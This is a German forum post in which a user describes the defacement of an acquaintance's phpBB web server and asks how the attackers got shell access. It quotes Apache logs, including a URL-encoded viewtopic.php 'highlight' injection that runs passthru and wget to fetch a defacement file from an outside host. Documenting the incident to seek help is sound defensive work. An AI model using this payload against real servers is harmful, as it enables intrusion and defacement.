Server gehacked

[Dumdideldum]

Ein Bekannter von mir wurde von Boxocide und ESX heimgesucht.
boxocide

Er hat einen GNU/Linux Webserver laufen mit Apache 2.0.51 (php und mysql versionen sind mir zurzeit nicht bekannt) - basierend auf FC2.

Nachdem ich mir die Logfiles angesehen hab bin ich mir nicht sicher, wie die reingekommen sind.

Jedenfalls wurden im DocumentRoot der Hauptseite (phpBB basierend) die wichtigsten Files durch .html files ersetzt.
Daneben laufen noch einige kleine Seiten, die durch Virtualhosts betrieben werden - welche jedoch alle durch .htaccess vom public-Zugriff abgeschirmt werden.

Der Server wird sowieso komplett neu aufgesetzt, da meine Fähigkeiten nicht ausreichen, um wirklich alles zu checken.

Einen Rootkit-Checker hab ich schon ausgeführt, der hat nichts Verdächtiges gefunden.


Nach langer Sucherei in den Logfiles ist mir jedoch folgendes aufgefallen:
(aus der access_log von Apache):

Zitat:

69.93.x.xxx - - [02/Dec/2004:02:48:04 +0100] "GET /viewtopic.php?t=%32%30&rush=%65%63%68%6F%20%5F%53% 54%41%52%54%5F%3B%20%77%67%65%74%20%68%74%74%70%3A %2F%2F%77%69%6C%6C%79%73%62%69%72%74%68%64%61%79%2 E%63%6F%6D%2F%68%61%63%6B%65%64%2E%68%74%6D%6C%3B% 20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.% 70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45 %54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 36025 "-" "-"

Das sieht mir etwas verdächtig aus - die Strings sind absolut untypisch.

Dann kommt das error_log:

Zitat:

--02:08:47-- http://www.xxxx.org/shk2.html
=> `shk2.html'
Resolving www.xxxx.org... 206.123.xx.xxx
Connecting to www.xxxxx.org[206.123.xx.xxxx]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 517 [text/html]

(xxxx ersetzt )

Und:

Zitat:

mv: cannot stat `hacked.html': No such file or directory
mv: cannot stat `hacked.html': No such file or directory
mv: cannot stat `hacked.html': No such file or directory
mv: cannot stat `hacked.html': No such file or directory
mv: cannot stat `hacked.html': No such file or directory

Also haben die anscheinend shell access erreicht.

Desweiteren scheint es, als ob group, shadow usw. in /etc auch geändert wurden, da es mit dem Änderungsdatum der index-Files im DocumentRoot übereinstimmt.
Genaueres kann ich erst sagen, wenn ich den Serverbetreiber ausflaschel.

Kann man mit diesen Angaben eine ungefähre Aussage tätigen, wie die da reingekommen sind ?
Ist es möglich, über phpBB Schwachstellen shell access zu ergaunern ?

Wie gesagt, der Server wird komplett neu aufgesetzt und ich habe weder das Wissen, noch das Interesse das komplette System forensisch zu untersuchen.
Denn was ich finden werde (im Fall des Falles) bringt sowieso nix, da ich annehme, dass die so gscheit sind und ihre Spuren verwischt haben.


Vielen Dank für Tips